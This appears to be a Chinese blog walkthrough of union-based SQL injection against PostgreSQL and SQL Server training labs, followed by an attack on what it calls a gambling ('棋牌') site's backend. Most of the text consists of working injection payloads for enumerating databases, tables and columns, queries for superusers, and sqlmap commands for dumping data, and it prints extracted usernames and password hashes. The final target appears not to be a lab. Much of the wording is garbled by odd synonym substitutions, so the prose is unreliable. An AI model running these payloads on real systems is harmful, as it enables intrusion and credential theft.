本文已参与「新人创造礼」活动，一同开启创造之路。

知识点：

SQL注入-PostgreSQL数据库

详细点：

Access无高权限注入点-只能猜解，仍是暴力猜解

MYSQL，PostgreSQL，MSSQL高权限注入点-可晋级读写履行等

墨者PostgreSQL数据注入

流程仍是相同的

首要是判别是否有注入点

and 1=2

报错性异常回显

存在注入点

字段判别

order by 4

当咱们判别字段为5的时候异常回显了

一切咱们判别他的字段有四个

那么咱们这个PostgreSQL数据库注入就有一点不相同了

下面是进行方位回显注入判别

咱们之前用的是

union select 1,2,3,4

但是咱们PostgreSQL数据库的就不相同了

他用的是

union select ‘null’,null,null,null

这个判别他是那个方位回显的标准是单引号在那个null后边

判别回显方位是1

and 1=2 union select 'null',null,null,null     不正常

判别回显方位是2

and 1=2 union select null,’null’,null,null 正常

判别回显方位是3

and 1=2 union select null,null,’null’,null 正常

判别回显方位是4

and 1=2union select null,null,null,’null’ 不正常

那么注入的方位便是

2和3的

方位

那么咱们下面便是获取库名

version()获取数据库版本

and 1=2 UNION SELECT null,version(),null,null

current_user获取当时用户

and 1=2 UNION SELECT null,current_user,null,null

current_database()获取数据库名

and 1=2 union select null,current_database(),null,null

获取数据库名

and 1=2 union select null,current_database(),null,null

mozhedvcms

获取一切的数据库名

在Postgresql中他是获取一切数据库名的意思

string_agg(datname,’,’)

‘,’ 两个单引号中心一个逗号表明 数据库和数据库之间用逗号隔开来区别

去哪里获取

去pg_database

and 1=2 union select null,string_agg(datname,','),null,null from pg_database

template1,template0,postgres,mozhedvcms

获取一切表名

and 1=2 union select null,string_agg(tablename,','),null,null from pg_tables where schemaname='public'

and 1=2 union select null,string_agg(relname,','),null,null from pg_stat_user_tables

获取列名

 and 1=2 union select null,string_agg(column_name,','),null,null from
 information_schema.columns where table_name='表名'

and 1=2 union select null,string_agg(column_name,','),null,null from
information_schema.columns where table_name='reg_users'

获取数据

and 1=2 union select null,string_agg(列名,','),string_agg(列名,','),null from 表名

and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users

mozhe2,mozhe1

1c63129ae9db9c60c3e8aa94d3e00495

50409e60d1dd94a86204cd153b01689d

获取超级用户

and 1=2 union select null,string_agg(usename,','),null,null FROM pg_user WHERE usesuper IS TRUE

超级用户之读取文件

参考：www.freebuf.com/sectool/249…

墨者SQLserver数据库注入

在咱们SQLserver中啊最高权限是sa

sa

判别是否有注入点

 and 1=2

当呈现这样无法判别是否存在注入点

咱们就之间跳过

来到判别回显方位

order by 4

4是正常的

5是报错的

说明有四个字段

下面便是测验回显位

and 1=2 union all select null,1,null,null

and 1=2 union all select null,null,'1',null

加单元格和不加都单引号都能够测出

但是两个方法都要用到

由于加单引号能够测出一部分不加单引号也能够测出一部分那么连个都用到取得的回显位就多了

@@version 获取版本信息

and 1=2 union all select null,null,@@version,null

db_name() 当时数据库姓名

 and 1=2 union all select null,null,db_name(),null

获取当时用户

user、system_user,current_user,user_name 获取当时用户名

and 1=2 union all select null,null,user,null –获取当时用户

and 1=2 union all select null,null,system_user,null

and 1=2 union all select null,null,current_user,,null –当时用户

and 1=2 union all select null,null,user_name,null

@@SERVERNAME 获取服务器主机信息

and 1=2 union all select null,db_name(),null,null

获取表名

and 1=2  union all select null,(select top 1 name from 库名.当时用户.sysobjects where xtype='u'),null,null

union all select null,(select top 1 name from 库名.当时用户.sysobjects where xtype='u' and name not in ('表名')),null,null

最这个表名在这个句子的意思是除了这个表名获取其他的表名

and 1=2  union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),null,null

manage

获取其他表名

 and 1=2 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage')),null,null

announcement

如果你觉得还要其他的表

就依照这方法去添加以知表名

and 1=2 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage','announcement')),null,null

没有其他表了

获取列名

and 1=2 union all select null,(select top 1 col_name(object_id(‘表名’),1) from sysobjects),null,null

表明这个表的第一个列名

and 1=2 union all select null,(select top 1 col_name(object_id(‘表名’),2) from sysobjects),null,null

表明这个表的第二个列名

and 1=2 union all select null,(select top 1 col_name(object_id(‘表名’),3) from sysobjects),null,null

表明这个表的三个列名

and 1=2 union all select null,(select top 1 col_name(object_id(‘表’),4) from sysobjects),null,null

表明这个表的第四个列名

and 1=2  union all select null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null,null

and 1=2  union all select null,(select top 1 col_name(object_id('manage'),2) from sysobjects),null,null

and 1=2  union all select null,(select top 1 col_name(object_id('manage'),3) from sysobjects),null,null

and 1=2  union all select null,(select top 1 col_name(object_id('manage'),4) from sysobjects),null,null

获取数据

and 1=2 union all select null,列名, 列名 ,null from 表名

and 1=2 union all select null,username, password ,null from manage

admin_mz

72e1bfc3f01b7583

干进棋牌系统后台

经过抓包工具抓包

首要判别他是否存在缝隙

判别是否存在缝隙

经过一个单引号判别是否存在

当咱们输入一个单引号后

他回显给咱们的是500状态

这就报错了

初步判别存在缝隙

那么咱们接下来就进行字段判别

字段判别

那么咱们为了以防万一

在后门加一个–+

闭合后门的sql句子

'order by 15--+

200表明没有报错

咱们试试16

16就报错了

说明字段为15个

现在以知字段了

下面便是回显方位了

回显位

'union select null,'null',null,null,null,null,null,null,null,null,null,null,null,null,null

第二个方位能够

第三个方位也能够

第七个也能够

第九也能够

第十二也能够

第十五也能够

2 3 7 9 12 15

这些都能够

那么下面就进行猜库名

基本就和上面相同的了

那么我就懒

直接上工具

把数据库复制到1.txt中

在注入的方位加上*星号

表明在这里进行注入

python sqlmap.py -r 1.txt

-r是星号专用制定浸透方位的

必需要-r

发现了注入的缝隙

罗列他一切数据库

爆库

python sqlmap.py -r 1.txt --dbs

python sqlmap.py -r 1.txt --current-db

暴力破解表

python sqlmap.py -r 1.txt --tables -D "库名"

要大写D

爆列

python sqlmap.py -r 1.txt --columns -T "表名" -D "库名"

要大写T

爆数据

python sqlmap.py -r 1.txt --dump -C "username字段,password字段" -T "表名" -D "库名"

就搞到这了